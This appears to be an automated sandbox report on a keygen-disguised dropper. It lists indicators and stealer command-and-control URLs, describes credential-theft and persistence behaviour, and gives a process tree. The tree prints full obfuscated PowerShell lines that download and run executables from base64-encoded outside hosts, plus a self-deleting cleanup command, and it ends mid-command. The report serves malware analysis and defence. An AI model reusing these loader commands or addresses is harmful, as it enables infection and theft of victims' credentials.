Resubmissions
- 12-11-2021 18:04 211112-wnzb8aahhm 10
- 19-11-2020 10:08 201119-rhwlt38jrx 10
- 18-11-2020 17:26 201118-htd4fq29va 10

Analysis
- max time kernel: 300s
- max time network: 301s
- platform: windows10_x64
- resource: win10-en-20211104
- submitted: 12-11-2021 18:04
Behavioral tasks
- behavioral1 | Sample: 1.bin/1.exe | Resource: win10-en-20211014
- behavioral2 | Sample: 2019-09-02_22-41-10.exe | Resource: win10-en-20211104
- behavioral3 | Sample: 31.exe | Resource: win10-en-20211014
- behavioral4 | Sample: 3DMark 11 Advanced Edition.exe | Resource: win10-en-20211104
- behavioral5 | Sample: 5da0116af495e6d8af7241da9b8281d918b9ff9a98a3deab4cca1aec1e456c18.exe | Resource: win10-en-20211104
- behavioral6 | Sample: Archive.zip__ccacaxs2tbz2t6ob3e.exe | Resource: win10-en-20211014
- behavioral7 | Sample: CVE-2018-15982_PoC.swf | Resource: win10-en-20211104
- behavioral8 | Sample: CVWSHSetup[1].bin/WSHSetup[1].exe | Resource: win10-en-20211014
- behavioral9 | Sample: DiskInternals_Uneraser_v5_keygen.exe | Resource: win10-en-20211104
- behavioral10 | Sample: ForceOp 2.8.7 - By RaiSence.exe | Resource: win10-en-20211014
- behavioral11 | Sample: HYDRA.exe | Resource: win10-en-20211104
- behavioral12 | Sample: Keygen.exe | Resource: win10-en-20211104
- behavioral13 | Sample: Lonelyscreen.1.2.9.keygen.by.Paradox/Lonelyscreen.1.2.9.keygen.by.Paradox.exe | Resource: win10-en-20211014
- behavioral14 | Sample: LtHv0O2KZDK4M637.exe | Resource: win10-en-20211104
- behavioral15 | Sample: Magic_File_v3_keygen_by_KeygenNinja.exe | Resource: win10-en-20211014
- behavioral16 | Sample: OnlineInstaller.exe | Resource: win10-en-20211104
- behavioral17 | Sample: Remouse.Micro.Micro.v3.5.3.serial.maker.by.aaocg.exe | Resource: win10-en-20211014
- behavioral18 | Sample: SecurityTaskManager_Setup.exe | Resource: win10-en-20211104
- behavioral19 | Sample: Treasure.Vault.3D.Screensaver.keygen.by.Paradox.exe | Resource: win10-en-20211104
- behavioral20 | Sample: VyprVPN.exe | Resource: win10-en-20211014
- behavioral21 | Sample: WSHSetup[1].exe | Resource: win10-en-20211104
- behavioral22 | Sample: ___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe | Resource: win10-en-20211014
- behavioral23 | Sample: ___ _ _____ __ ___/전산 및 비전산자료 보존 요청서/전산 및 비전산자료 보존 요.exe | Resource: win10-en-20211104
- behavioral24 | Sample: amtemu.v0.9.2.win-painter_edited.exe | Resource: win10-en-20211104
- behavioral25 | Sample: api.exe | Resource: win10-en-20211014
- behavioral26 | Sample: default.exe | Resource: win10-en-20211104
- behavioral27 | Sample: efd97b1038e063779fb32a3ab35adc481679a5c6c8e3f4f69c44987ff08b6ea4.js | Resource: win10-en-20211014
- behavioral28 | Sample: good.exe | Resource: win10-en-20211104
- behavioral29 | Sample: infected dot net installer.exe | Resource: win10-en-20211014
- behavioral30 | Sample: oof.exe | Resource: win10-en-20211104
- behavioral31 | Sample: ou55sg33s_1.exe | Resource: win10-en-20211014
General
- Target: Keygen.exe
- Size: 849KB
- MD5: dbde61502c5c0e17ebc6919f361c32b9
- SHA1: 189749cf0b66a9f560b68861f98c22cdbcafc566
- SHA256: 88cad5f9433e50af09ac9cad9db06e9003e85be739060b88b64186c05c0d636b
- SHA512: d9b8537f05844ec2f2549e2049e967a8023bfe432e3a9cf25fc0f7ad720e57a5830be733e1812cc806c5b68cd9586a031e394f67fc7e3f7fe390625fd5dedfbb
Malware Config
- Extracted: http://bit.do/fqhHT
- Extracted: http://bit.do/fqhJv
- Extracted: http://rbcxvnb.ug/zxcvb.exe
- Extracted: http://zxvbcrt.ug/zxcvb.exe
- Extracted: http://pdshcjvnv.ug/zxcvb.exe
- Extracted: http://bit.do/fqhJD
- Extracted: raccoon
  - 32365171a31c4583d6e3b7aad1690e41cefc38eb
  - url4cnc: http://telegalive.top/brikitiki, http://toptelete.top/brikitiki, http://telegraf.top/brikitiki, https://t.me/brikitiki
- Extracted: azorult
  - http://195.245.112.115/index.php
- Extracted: oski
  - colonna.ac.ug
Signatures
- Azorult
  An information stealer that was first discovered in 2016, targeting browsing history and passwords.
- Oski
  Oski is an infostealer targeting browser data and crypto wallets.
- Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 4892 created 4848 | 4892 | WerFault.exe | 104
- suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
- suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
- Blocklisted process makes network request (4 IoCs)
  flow | pid | Process
  26 | 1768 | powershell.exe
  27 | 1536 | powershell.exe
  28 | 2012 | powershell.exe
  33 | 1536 | powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (24 IoCs)
  pid | Process
  3920 | Keygen.exe
  4156 | sko.exe
  4212 | qdt.exe
  4300 | yfu.exe
  4404 | cdvcxsdme.exe
  4428 | vbndfgame.exe
  4824 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4848 | qdt.exe
  4884 | sko.exe
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  2344 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4296 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  3204 | Dxndvkhrxwosconsoleapp14.exe
  3628 | Dxndvkhrxwosconsoleapp14.exe
  4184 | cc.exe
  4484 | pm.exe
  4596 | Dxndvkhrxwosconsoleapp14.exe
  4616 | Dxndvkhrxwosconsoleapp14.exe
  5040 | aspnet_compiler.exe
  1556 | cc.exe
  1760 | yfu.exe
  1272 | vbndfgame.exe
  2404 | cdvcxsdme.exe
- Loads dropped DLL (10 IoCs)
  pid | Process
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4596 | Dxndvkhrxwosconsoleapp14.exe
  4596 | Dxndvkhrxwosconsoleapp14.exe
  4596 | Dxndvkhrxwosconsoleapp14.exe
  1272 | vbndfgame.exe
  1272 | vbndfgame.exe
  1272 | vbndfgame.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads local data of messenger clients (2 TTPs)
  Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk, where infostealers often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Accesses Microsoft Outlook profiles (1 TTPs, 3 IoCs)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Adds Run key to start application (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\winda = "\"C:\\Users\\Admin\\AppData\\Roaming\\winda.exe\"" | pm.exe
- Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Suspicious use of SetThreadContext (11 IoCs)
  description | pid | Process | procid_target
  PID 4212 set thread context of 4848 | 4212 | qdt.exe | 104
  PID 4156 set thread context of 4884 | 4156 | sko.exe | 103
  PID 4824 set thread context of 2020 | 4824 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe | 107
  PID 4836 set thread context of 4296 | 4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe | 109
  PID 3204 set thread context of 4596 | 3204 | Dxndvkhrxwosconsoleapp14.exe | 117
  PID 3628 set thread context of 4616 | 3628 | Dxndvkhrxwosconsoleapp14.exe | 118
  PID 4484 set thread context of 5040 | 4484 | pm.exe | 125
  PID 4184 set thread context of 1556 | 4184 | cc.exe | 127
  PID 4300 set thread context of 1760 | 4300 | yfu.exe | 132
  PID 4428 set thread context of 1272 | 4428 | vbndfgame.exe | 133
  PID 4404 set thread context of 2404 | 4404 | cdvcxsdme.exe | 134
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Program crash (2 IoCs)
  pid | pid_target | Process | procid_target
  4820 | 4616 | WerFault.exe | 118
  4892 | 4848 | WerFault.exe | 104
- Checks processor information in registry (2 TTPs, 4 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  description | ioc | Process
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | vbndfgame.exe
  Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | Dxndvkhrxwosconsoleapp14.exe
- Creates scheduled task(s) (1 TTPs, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid | Process
  4272 | schtasks.exe
- Delays execution with timeout.exe (3 IoCs)
  pid | Process
  596 | timeout.exe
  4564 | timeout.exe
  1576 | timeout.exe
- Kills process with taskkill (2 IoCs)
  pid | Process
  4996 | taskkill.exe
  3840 | taskkill.exe
- Modifies registry class (5 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings | qdt.exe
  Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings | sko.exe
  Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Key created | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings | cmd.exe
- Modifies system certificate store (2 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | cc.exe
  Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = (hex-encoded certificate blob, omitted) | cc.exe
- Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  1536 | powershell.exe
  1264 | powershell.exe
  1508 | powershell.exe
  2012 | powershell.exe
  2344 | powershell.exe
  1768 | powershell.exe
  1264 | powershell.exe
  2344 | powershell.exe
  1768 | powershell.exe
  1508 | powershell.exe
  1536 | powershell.exe
  2012 | powershell.exe
  2344 | powershell.exe
  1264 | powershell.exe
  2012 | powershell.exe
  1768 | powershell.exe
  1508 | powershell.exe
  1536 | powershell.exe
  4156 | sko.exe
  4212 | qdt.exe
  4212 | qdt.exe
  4212 | qdt.exe
  4156 | sko.exe
  4156 | sko.exe
  4824 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4824 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4824 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  3204 | Dxndvkhrxwosconsoleapp14.exe
  3628 | Dxndvkhrxwosconsoleapp14.exe
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  2020 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  4484 | pm.exe
  3204 | Dxndvkhrxwosconsoleapp14.exe
  3204 | Dxndvkhrxwosconsoleapp14.exe
  3628 | Dxndvkhrxwosconsoleapp14.exe
  3628 | Dxndvkhrxwosconsoleapp14.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4820 | WerFault.exe
  4484 | pm.exe
  4484 | pm.exe
  4892 | WerFault.exe
  4892 | WerFault.exe
  4892 | WerFault.exe
  4892 | WerFault.exe
  4892 | WerFault.exe
- Suspicious behavior: MapViewOfSection (3 IoCs)
  pid | Process
  4300 | yfu.exe
  4428 | vbndfgame.exe
  4404 | cdvcxsdme.exe
- Suspicious use of AdjustPrivilegeToken (20 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1508 | powershell.exe
  Token: SeDebugPrivilege | 1264 | powershell.exe
  Token: SeDebugPrivilege | 2012 | powershell.exe
  Token: SeDebugPrivilege | 1536 | powershell.exe
  Token: SeDebugPrivilege | 2344 | powershell.exe
  Token: SeDebugPrivilege | 1768 | powershell.exe
  Token: SeDebugPrivilege | 4156 | sko.exe
  Token: SeDebugPrivilege | 4212 | qdt.exe
  Token: SeDebugPrivilege | 4824 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Token: SeDebugPrivilege | 4836 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
  Token: SeDebugPrivilege | 3204 | Dxndvkhrxwosconsoleapp14.exe
  Token: SeDebugPrivilege | 3628 | Dxndvkhrxwosconsoleapp14.exe
  Token: SeDebugPrivilege | 4484 | pm.exe
  Token: SeRestorePrivilege | 4820 | WerFault.exe
  Token: SeBackupPrivilege | 4820 | WerFault.exe
  Token: SeDebugPrivilege | 4820 | WerFault.exe
  Token: SeDebugPrivilege | 4996 | taskkill.exe
  Token: SeDebugPrivilege | 4892 | WerFault.exe
  Token: SeDebugPrivilege | 5040 | aspnet_compiler.exe
  Token: SeDebugPrivilege | 3840 | taskkill.exe
- Suspicious use of SetWindowsHookEx (4 IoCs)
  pid | Process
  3920 | Keygen.exe
  4300 | yfu.exe
  4404 | cdvcxsdme.exe
  4428 | vbndfgame.exe
- Suspicious use of WriteProcessMemory (64 IoCs)
  description | pid | Process | procid_target
  PID 1016 wrote to memory of 4020 | 1016 | Keygen.exe | 68
  PID 1016 wrote to memory of 4020 | 1016 | Keygen.exe | 68
  PID 1016 wrote to memory of 4020 | 1016 | Keygen.exe | 68
  PID 4020 wrote to memory of 3920 | 4020 | cmd.exe | 71
  PID 4020 wrote to memory of 3920 | 4020 | cmd.exe | 71
  PID 4020 wrote to memory of 3920 | 4020 | cmd.exe | 71
  PID 4020 wrote to memory of 3556 | 4020 | cmd.exe | 72
  PID 4020 wrote to memory of 3556 | 4020 | cmd.exe | 72
  PID 4020 wrote to memory of 3556 | 4020 | cmd.exe | 72
  PID 4020 wrote to memory of 1584 | 4020 | cmd.exe | 73
  PID 4020 wrote to memory of 1584 | 4020 | cmd.exe | 73
  PID 4020 wrote to memory of 1584 | 4020 | cmd.exe | 73
  PID 4020 wrote to memory of 1576 | 4020 | cmd.exe | 74
  PID 4020 wrote to memory of 1576 | 4020 | cmd.exe | 74
  PID 4020 wrote to memory of 1576 | 4020 | cmd.exe | 74
  PID 4020 wrote to memory of 396 | 4020 | cmd.exe | 75
  PID 4020 wrote to memory of 396 | 4020 | cmd.exe | 75
  PID 4020 wrote to memory of 396 | 4020 | cmd.exe | 75
  PID 4020 wrote to memory of 400 | 4020 | cmd.exe | 76
  PID 4020 wrote to memory of 400 | 4020 | cmd.exe | 76
  PID 4020 wrote to memory of 400 | 4020 | cmd.exe | 76
  PID 4020 wrote to memory of 596 | 4020 | cmd.exe | 77
  PID 4020 wrote to memory of 596 | 4020 | cmd.exe | 77
  PID 4020 wrote to memory of 596 | 4020 | cmd.exe | 77
  PID 4020 wrote to memory of 344 | 4020 | cmd.exe | 78
  PID 4020 wrote to memory of 344 | 4020 | cmd.exe | 78
  PID 4020 wrote to memory of 344 | 4020 | cmd.exe | 78
  PID 4020 wrote to memory of 1912 | 4020 | cmd.exe | 79
  PID 4020 wrote to memory of 1912 | 4020 | cmd.exe | 79
  PID 4020 wrote to memory of 1912 | 4020 | cmd.exe | 79
  PID 1912 wrote to memory of 1264 | 1912 | mshta.exe | 82
  PID 1912 wrote to memory of 1264 | 1912 | mshta.exe | 82
  PID 1912 wrote to memory of 1264 | 1912 | mshta.exe | 82
  PID 396 wrote to memory of 2344 | 396 | mshta.exe | 81
  PID 396 wrote to memory of 2344 | 396 | mshta.exe | 81
  PID 396 wrote to memory of 2344 | 396 | mshta.exe | 81
  PID 3556 wrote to memory of 1536 | 3556 | mshta.exe | 80
  PID 3556 wrote to memory of 1536 | 3556 | mshta.exe | 80
  PID 3556 wrote to memory of 1536 | 3556 | mshta.exe | 80
  PID 1584 wrote to memory of 1508 | 1584 | mshta.exe | 83
  PID 1584 wrote to memory of 1508 | 1584 | mshta.exe | 83
  PID 1584 wrote to memory of 1508 | 1584 | mshta.exe | 83
  PID 344 wrote to memory of 2012 | 344 | mshta.exe | 88
  PID 344 wrote to memory of 2012 | 344 | mshta.exe | 88
  PID 344 wrote to memory of 2012 | 344 | mshta.exe | 88
  PID 400 wrote to memory of 1768 | 400 | mshta.exe | 85
  PID 400 wrote to memory of 1768 | 400 | mshta.exe | 85
  PID 400 wrote to memory of 1768 | 400 | mshta.exe | 85
  PID 1768 wrote to memory of 4156 | 1768 | powershell.exe | 94
  PID 1768 wrote to memory of 4156 | 1768 | powershell.exe | 94
  PID 1768 wrote to memory of 4156 | 1768 | powershell.exe | 94
  PID 2344 wrote to memory of 4212 | 2344 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe | 95
  PID 2344 wrote to memory of 4212 | 2344 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe | 95
  PID 2344 wrote to memory of 4212 | 2344 | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe | 95
  PID 1536 wrote to memory of 4300 | 1536 | powershell.exe | 96
  PID 1536 wrote to memory of 4300 | 1536 | powershell.exe | 96
  PID 1536 wrote to memory of 4300 | 1536 | powershell.exe | 96
  PID 4300 wrote to memory of 4404 | 4300 | yfu.exe | 97
  PID 4300 wrote to memory of 4404 | 4300 | yfu.exe | 97
  PID 4300 wrote to memory of 4404 | 4300 | yfu.exe | 97
  PID 4300 wrote to memory of 4428 | 4300 | yfu.exe | 98
  PID 4300 wrote to memory of 4428 | 4300 | yfu.exe | 98
  PID 4300 wrote to memory of 4428 | 4300 | yfu.exe | 98
  PID 4212 wrote to memory of 4692 | 4212 | qdt.exe | 99
- outlook_office_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
- outlook_win_path (1 IoC)
  description | ioc | Process
  Key opened | \REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Processes (indented by depth in the process tree; [n] is the depth)

[1] C:\Users\Admin\AppData\Local\Temp\Keygen.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
    PID: 1016
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\SysWOW64\cmd.exe
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\60C9.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.exe"
      PID: 4020
      - Modifies registry class
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\60C9.tmp\Keygen.exe
        Command line: Keygen.exe
        PID: 3920
        - Executes dropped EXE
        - Suspicious use of SetWindowsHookEx
    [3] C:\Windows\SysWOW64\mshta.exe
        Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        PID: 3556
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          PID: 1536
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
        [5] C:\Users\Public\yfu.exe
            Command line: "C:\Users\Public\yfu.exe"
            PID: 4300
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of SetWindowsHookEx
            - Suspicious use of WriteProcessMemory
          [6] C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"
              PID: 4404
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Suspicious behavior: MapViewOfSection
              - Suspicious use of SetWindowsHookEx
            [7] C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\cdvcxsdme.exe"
                PID: 2404
                - Executes dropped EXE
          [6] C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe
              Command line: "C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"
              PID: 4428
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Suspicious behavior: MapViewOfSection
              - Suspicious use of SetWindowsHookEx
            [7] C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe
                Command line: "C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe"
                PID: 1272
                - Executes dropped EXE
                - Loads dropped DLL
                - Checks processor information in registry
              [8] C:\Windows\SysWOW64\cmd.exe
                  Command line: "C:\Windows\System32\cmd.exe" /c taskkill /pid 1272 & erase C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe & RD /S /Q C:\\ProgramData\\333368708752611\\* & exit
                  PID: 1464
                [9] C:\Windows\SysWOW64\taskkill.exe
                    Command line: taskkill /pid 1272
                    PID: 3840
                    - Kills process with taskkill
                    - Suspicious use of AdjustPrivilegeToken
          [6] C:\Users\Public\yfu.exe
              Command line: "C:\Users\Public\yfu.exe"
              PID: 1760
              - Executes dropped EXE
    [3] C:\Windows\SysWOW64\mshta.exe
        Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        PID: 1584
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          PID: 1508
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
    [3] C:\Windows\SysWOW64\timeout.exe
        Command line: timeout 1
        PID: 1576
        - Delays execution with timeout.exe
    [3] C:\Windows\SysWOW64\mshta.exe
        Command line: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        PID: 396
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 